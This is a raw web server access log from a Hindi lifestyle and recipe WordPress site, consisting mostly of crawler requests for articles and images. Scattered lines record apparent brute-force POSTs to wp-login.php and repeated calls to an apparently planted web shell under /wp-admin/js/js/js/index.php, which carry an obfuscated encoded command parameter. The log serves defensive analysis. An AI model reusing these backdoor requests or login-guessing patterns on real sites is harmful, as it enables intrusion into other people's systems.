47.128.47.176 - - [20/Oct/2025:08:11:29 -0400] "GET /wp-content/plugins/td-standard-pack/Newspaper/assets/css/td_standard_pack_main.css?ver=8ae1459a1d876d507918f73cef68310e HTTP/2.0" 304 - "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:29 -0400] "GET /wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=d578089f160957352b9b4ca6d880fd8f HTTP/2.0" 304 - "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:29 -0400] "GET /wp-content/uploads/2017/08/How-to-save-your-broken-relationship-intro.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:29 -0400] "GET /wp-content/uploads/2017/08/Talk-with-each-other.jpg HTTP/2.0" 200 81958 "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:29 -0400] "GET /wp-content/uploads/2017/08/Keep-your-family-happy.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:29 -0400] "GET /wp-content/uploads/2017/08/How-to-save-your-broken-relationship.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:30 -0400] "GET /wp-content/uploads/2017/08/Give-Him-Space.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.176 - - [20/Oct/2025:08:11:30 -0400] "GET /wp-content/uploads/2017/08/Take-help-of-your-elders.jpg HTTP/2.0" 200 89107 "https://hindi.blushin.com/how-to-save-your-broken-relationship/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
103.153.42.48 - - [20/Oct/2025:08:11:31 -0400] "POST /wp-login.php HTTP/2.0" 200 7086 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.46.255 - - [20/Oct/2025:08:11:38 -0400] "GET /have-fun-with-holidaying-on-beaches-in-winters/ HTTP/2.0" 200 317205 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:09:14 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353735342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323135342q3137393835613563396264636635313330666534316663623830343166353234222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
47.128.46.255 - - [20/Oct/2025:08:11:41 -0400] "GET /wp-content/uploads/2016/01/%E0%A4%97%E0%A5%8B%E0%A4%B5%E0%A4%BE-%E0%A4%95%E0%A5%80-%E0%A4%85%E0%A4%A8%E0%A5%8B%E0%A4%96%E0%A5%80-%E0%A4%B8%E0%A4%82%E0%A4%B8%E0%A5%8D%E0%A4%95%E0%A5%83%E0%A4%A4%E0%A4%BF.jpg HTTP/2.0" 200 187914 "https://hindi.blushin.com/have-fun-with-holidaying-on-beaches-in-winters/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.46.255 - - [20/Oct/2025:08:11:41 -0400] "GET /wp-content/uploads/2016/01/%E0%A4%95%E0%A5%87%E0%A4%B0%E0%A4%B2-%E0%A4%8F%E0%A4%95-%E0%A4%B8%E0%A5%8C%E0%A4%82%E0%A4%A6%E0%A4%B0%E0%A5%8D%E0%A4%AF-%E0%A4%95%E0%A5%80-%E0%A4%98%E0%A4%BE%E0%A4%9F%E0%A5%80.jpg HTTP/2.0" 200 350149 "https://hindi.blushin.com/have-fun-with-holidaying-on-beaches-in-winters/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.46.255 - - [20/Oct/2025:08:11:41 -0400] "GET /wp-content/uploads/2016/01/%E0%A4%9C%E0%A4%BE%E0%A5%9C%E0%A5%87-%E0%A4%AE%E0%A5%87%E0%A4%82-%E0%A4%B2%E0%A5%87%E0%A4%82-%E0%A4%B8%E0%A4%AE%E0%A5%81%E0%A4%A6%E0%A5%8D%E0%A4%B0-%E0%A4%A4%E0%A4%9F%E0%A5%8B%E0%A4%82-%E0%A4%AA%E0%A4%B0-%E0%A4%98%E0%A5%82%E0%A4%AE%E0%A4%A8%E0%A5%87-%E0%A4%95%E0%A4%BE-%E0%A4%AE%E0%A4%9C%E0%A4%BE.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/have-fun-with-holidaying-on-beaches-in-winters/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.46.255 - - [20/Oct/2025:08:11:43 -0400] "GET /wp-content/uploads/2016/01/Cover-page-42.jpg HTTP/2.0" 200 256231 "https://hindi.blushin.com/have-fun-with-holidaying-on-beaches-in-winters/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.46.255 - - [20/Oct/2025:08:11:43 -0400] "GET /wp-content/uploads/2016/01/%E0%A4%A4%E0%A4%AE%E0%A4%BF%E0%A4%B2%E0%A4%A8%E0%A4%BE%E0%A4%A1%E0%A5%81-%E0%A4%B9%E0%A5%88-%E0%A4%B5%E0%A5%88%E0%A4%AD%E0%A4%B5-%E0%A4%95%E0%A4%BE-%E0%A4%B8%E0%A5%8D%E0%A4%A5%E0%A4%BE%E0%A4%A8.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/have-fun-with-holidaying-on-beaches-in-winters/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:11:45 -0400] "GET /tag/%E0%A4%9C%E0%A4%A8%E0%A5%8D%E0%A4%AE%E0%A4%BE%E0%A4%B7%E0%A5%8D%E0%A4%9F%E0%A4%AE%E0%A5%80 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:11:47 -0400] "GET /tag/%E0%A4%9C%E0%A4%A8%E0%A5%8D%E0%A4%AE%E0%A4%BE%E0%A4%B7%E0%A5%8D%E0%A4%9F%E0%A4%AE%E0%A5%80/ HTTP/2.0" 200 150172 "https://hindi.blushin.com/tag/%E0%A4%9C%E0%A4%A8%E0%A5%8D%E0%A4%AE%E0%A4%BE%E0%A4%B7%E0%A5%8D%E0%A4%9F%E0%A4%AE%E0%A5%80" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.30.111 - - [20/Oct/2025:08:11:49 -0400] "GET /hair-stylist-jawed-habib-tells-how-to-take-care-of-hair-during-summers/ HTTP/2.0" 200 315816 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.30.111 - - [20/Oct/2025:08:11:51 -0400] "GET /wp-content/uploads/2017/05/282.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/hair-stylist-jawed-habib-tells-how-to-take-care-of-hair-during-summers/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.30.111 - - [20/Oct/2025:08:11:51 -0400] "GET /wp-content/uploads/2017/05/380.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/hair-stylist-jawed-habib-tells-how-to-take-care-of-hair-during-summers/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.30.111 - - [20/Oct/2025:08:11:52 -0400] "GET /wp-content/uploads/2017/05/476.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/hair-stylist-jawed-habib-tells-how-to-take-care-of-hair-during-summers/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.30.111 - - [20/Oct/2025:08:11:52 -0400] "GET /wp-content/uploads/2017/05/182.jpg HTTP/2.0" 200 56242 "https://hindi.blushin.com/hair-stylist-jawed-habib-tells-how-to-take-care-of-hair-during-summers/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.30.111 - - [20/Oct/2025:08:11:52 -0400] "GET /wp-content/uploads/2017/05/570.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/hair-stylist-jawed-habib-tells-how-to-take-care-of-hair-during-summers/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.30.111 - - [20/Oct/2025:08:11:53 -0400] "GET /wp-content/uploads/2017/05/654.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/hair-stylist-jawed-habib-tells-how-to-take-care-of-hair-during-summers/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
85.208.96.201 - - [20/Oct/2025:08:11:54 -0400] "GET /tag/how-to-use-curry-leaves-for-hair-loss/ HTTP/2.0" 200 150053 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:11:56 -0400] "GET /tag/possible-to-love-with-two-people HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:11:58 -0400] "GET /tag/possible-to-love-with-two-people/ HTTP/2.0" 200 149795 "https://hindi.blushin.com/tag/possible-to-love-with-two-people" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
85.208.96.207 - - [20/Oct/2025:08:12:00 -0400] "GET /tag/teenager-wont-go-to-school/ HTTP/2.0" 200 149890 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
47.128.35.191 - - [20/Oct/2025:08:12:01 -0400] "GET /here-is-how-potatoes-can-help-you-lose-weight/ HTTP/2.0" 200 315718 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:09:36 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353737362p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323137362q3333643835653962326164373938316434313139346430333265613439626562222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
47.128.35.191 - - [20/Oct/2025:08:12:03 -0400] "GET /wp-content/uploads/2016/08/How-Potatoes-Can-Help-Lose-Weight.jpg HTTP/2.0" 200 90711 "https://hindi.blushin.com/here-is-how-potatoes-can-help-you-lose-weight/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.111.29 - - [20/Oct/2025:08:12:12 -0400] "GET /tag/allergic-reactions HTTP/2.0" 301 - "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.111.29 - - [20/Oct/2025:08:12:13 -0400] "GET /tag/allergic-reactions/ HTTP/2.0" 200 149459 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:12:23 -0400] "GET /tag/spicy-rajma-with-punjabi-tadka-recipe/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:09:58 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353739382p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323139382q3332316263363332396439363137393137393731333933346430653964663362222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
47.128.55.217 - - [20/Oct/2025:08:12:23 -0400] "GET /how-to-stay-healthy-at-workplace/ HTTP/2.0" 200 315769 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.55.217 - - [20/Oct/2025:08:12:25 -0400] "GET /wp-content/uploads/2017/02/how-to-stay-healthy-at-workplace-2.jpg HTTP/2.0" 200 77478 "https://hindi.blushin.com/how-to-stay-healthy-at-workplace/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.55.217 - - [20/Oct/2025:08:12:25 -0400] "GET /wp-content/uploads/2017/02/how-to-stay-healthy-at-workplace-1.jpg HTTP/2.0" 200 62134 "https://hindi.blushin.com/how-to-stay-healthy-at-workplace/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.55.217 - - [20/Oct/2025:08:12:25 -0400] "GET /wp-content/uploads/2017/02/how-to-stay-healthy-at-workplace-3.jpg HTTP/2.0" 200 81403 "https://hindi.blushin.com/how-to-stay-healthy-at-workplace/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.55.217 - - [20/Oct/2025:08:12:26 -0400] "GET /wp-content/uploads/2017/02/eat-healthy-at-workplace_cover-image.jpg HTTP/2.0" 200 47891 "https://hindi.blushin.com/how-to-stay-healthy-at-workplace/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.55.217 - - [20/Oct/2025:08:12:26 -0400] "GET /wp-content/uploads/2017/02/how-to-stay-healthy-at-workplace-4.jpg HTTP/2.0" 200 63232 "https://hindi.blushin.com/how-to-stay-healthy-at-workplace/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.55.217 - - [20/Oct/2025:08:12:26 -0400] "GET /wp-content/uploads/2017/02/how-to-stay-healthy-at-workplace-5.jpg HTTP/2.0" 200 108677 "https://hindi.blushin.com/how-to-stay-healthy-at-workplace/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:12:25 -0400] "GET /tag/spicy-rajma-with-punjabi-tadka-recipe/feed/ HTTP/2.0" 200 8929 "https://hindi.blushin.com/tag/spicy-rajma-with-punjabi-tadka-recipe/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
148.72.247.255 - - [20/Oct/2025:08:12:29 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:12:29 -0400] "GET /tag/bread-dahi-vada/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
148.72.247.255 - - [20/Oct/2025:08:12:30 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:12:31 -0400] "GET /tag/bread-dahi-vada/feed/ HTTP/2.0" 200 20277 "https://hindi.blushin.com/tag/bread-dahi-vada/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
178.32.113.195 - - [20/Oct/2025:08:12:32 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.32.113.195 - - [20/Oct/2025:08:12:32 -0400] "POST /wp-login.php HTTP/2.0" 200 7091 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.122.104 - - [20/Oct/2025:08:12:32 -0400] "GET /tag/allergic-reactions/ HTTP/2.0" 200 44316 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; TikTokSpider; [email protected])"
47.128.122.104 - - [20/Oct/2025:08:12:33 -0400] "GET /wp-content/uploads/2016/04/Side-Effects-of-Turmeric.jpg HTTP/2.0" 200 93907 "https://hindi.blushin.com/tag/allergic-reactions/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; TikTokSpider; [email protected])"
173.212.200.159 - - [20/Oct/2025:08:12:33 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
173.212.200.159 - - [20/Oct/2025:08:12:34 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.40.242 - - [20/Oct/2025:08:12:35 -0400] "GET /tasty-healthy-and-spicy-sabudana-khichdi/ HTTP/2.0" 200 315688 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
95.111.254.218 - - [20/Oct/2025:08:12:36 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.40.242 - - [20/Oct/2025:08:12:37 -0400] "GET /wp-content/uploads/2016/02/%E0%A4%B8%E0%A4%BE%E0%A4%AC%E0%A5%82%E0%A4%A6%E0%A4%BE%E0%A4%A8%E0%A5%87-%E0%A4%95%E0%A5%80-%E0%A4%96%E0%A4%BF%E0%A4%9A%E0%A4%A1%E0%A4%BC%E0%A5%80-%E0%A4%96%E0%A4%BE%E0%A4%A8%E0%A5%87.jpg HTTP/2.0" 200 110352 "https://hindi.blushin.com/tasty-healthy-and-spicy-sabudana-khichdi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.40.242 - - [20/Oct/2025:08:12:37 -0400] "GET /wp-content/uploads/2016/02/%E0%A4%B8%E0%A4%BE%E0%A4%AC%E0%A5%82%E0%A4%A6%E0%A4%BE%E0%A4%A8%E0%A4%BE-%E0%A4%AC%E0%A4%A8%E0%A4%BE%E0%A4%A8%E0%A5%87-%E0%A4%95%E0%A5%80-%E0%A4%B8%E0%A4%BE%E0%A4%AE%E0%A4%97%E0%A5%8D%E0%A4%B0%E0%A5%80.jpg HTTP/2.0" 200 101271 "https://hindi.blushin.com/tasty-healthy-and-spicy-sabudana-khichdi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.40.242 - - [20/Oct/2025:08:12:37 -0400] "GET /wp-content/uploads/2016/02/%E0%A4%B8%E0%A4%BE%E0%A4%AC%E0%A5%82%E0%A4%A6%E0%A4%BE%E0%A4%A8%E0%A5%87-%E0%A4%95%E0%A5%80-%E0%A4%96%E0%A4%BF%E0%A4%9A%E0%A4%A1%E0%A4%BC%E0%A5%80-%E0%A4%95%E0%A5%8B-C.jpg HTTP/2.0" 200 82567 "https://hindi.blushin.com/tasty-healthy-and-spicy-sabudana-khichdi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
95.111.254.218 - - [20/Oct/2025:08:12:37 -0400] "POST /wp-login.php HTTP/2.0" 200 7091 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.40.242 - - [20/Oct/2025:08:12:37 -0400] "GET /wp-content/uploads/2016/02/%E0%A4%87%E0%A4%B8%E0%A4%95%E0%A5%87-%E0%A4%AC%E0%A4%BE%E0%A4%A6-%E0%A4%95%E0%A4%A2%E0%A4%BC%E0%A4%BE%E0%A4%88-%E0%A4%AE%E0%A5%87%E0%A4%82-%E0%A4%A4%E0%A5%87%E0%A4%B2.jpg HTTP/2.0" 200 103560 "https://hindi.blushin.com/tasty-healthy-and-spicy-sabudana-khichdi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.40.242 - - [20/Oct/2025:08:12:37 -0400] "GET /wp-content/uploads/2016/02/%E0%A4%87%E0%A4%B8%E0%A4%95%E0%A5%87-%E0%A4%AC%E0%A4%BE%E0%A4%A6-%E0%A4%AC%E0%A4%9A%E0%A5%87-%E0%A4%B9%E0%A5%81%E0%A4%8F-%E0%A4%98%E0%A5%80-%E0%A4%AE%E0%A5%87%E0%A4%82-%E0%A4%9C%E0%A5%80%E0%A4%B0%E0%A4%BE.jpg HTTP/2.0" 200 123363 "https://hindi.blushin.com/tasty-healthy-and-spicy-sabudana-khichdi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.40.242 - - [20/Oct/2025:08:12:37 -0400] "GET /wp-content/uploads/2016/02/sabudana-khichdi.jpg HTTP/2.0" 200 71658 "https://hindi.blushin.com/tasty-healthy-and-spicy-sabudana-khichdi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
46.101.0.130 - - [20/Oct/2025:08:12:39 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
46.101.0.130 - - [20/Oct/2025:08:12:40 -0400] "POST /wp-login.php HTTP/2.0" 200 7089 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:10:20 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936353832302p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936323232302q6636333632653835313534616166336237316333663563636432323232356430222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
57.159.28.36 - - [20/Oct/2025:08:12:47 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "-" "Mozilla/5.0"
47.128.47.84 - - [20/Oct/2025:08:12:46 -0400] "GET /lemon-chicken-pasta-recipe/ HTTP/2.0" 200 310480 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
57.159.28.36 - - [20/Oct/2025:08:12:47 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "-" "Mozilla/5.0"
57.159.28.36 - - [20/Oct/2025:08:12:47 -0400] "POST /wp-login.php HTTP/2.0" 200 7092 "-" "Mozilla/5.0"
57.159.28.36 - - [20/Oct/2025:08:12:47 -0400] "POST /wp-login.php HTTP/2.0" 200 7137 "-" "Mozilla/5.0"
57.159.28.36 - - [20/Oct/2025:08:12:47 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "-" "Mozilla/5.0"
57.159.28.36 - - [20/Oct/2025:08:12:47 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "-" "Mozilla/5.0"
47.128.47.84 - - [20/Oct/2025:08:12:48 -0400] "GET /wp-content/uploads/2016/03/Col1.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/lemon-chicken-pasta-recipe/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.84 - - [20/Oct/2025:08:12:48 -0400] "GET /wp-content/uploads/2016/03/%E0%A4%87%E0%A4%B8%E0%A4%95%E0%A5%87-%E0%A4%AC%E0%A4%BE%E0%A4%A6-%E0%A4%87%E0%A4%B8%E0%A5%87-%E0%A4%B2%E0%A4%97%E0%A4%AD%E0%A4%97-%E0%A4%A6%E0%A5%8B-%E0%A4%AE%E0%A4%BF%E0%A4%A8%E0%A4%9F.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/lemon-chicken-pasta-recipe/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.47.84 - - [20/Oct/2025:08:12:48 -0400] "GET /wp-content/uploads/2016/03/%E0%A4%9C%E0%A4%AC-%E0%A4%AD%E0%A5%80-%E0%A4%86%E0%A4%AA%E0%A4%95%E0%A5%8B-%E0%A4%98%E0%A4%B0-%E0%A4%AE%E0%A5%87%E0%A4%82-%E0%A4%9C%E0%A5%8B%E0%A4%B0%E0%A5%8B%E0%A4%82-%E0%A4%B8%E0%A5%87-%E0%A4%AD%E0%A5%82%E0%A4%96-%E0%A4%B2%E0%A4%97%E0%A4%A4%E0%A5%80.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/lemon-chicken-pasta-recipe/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
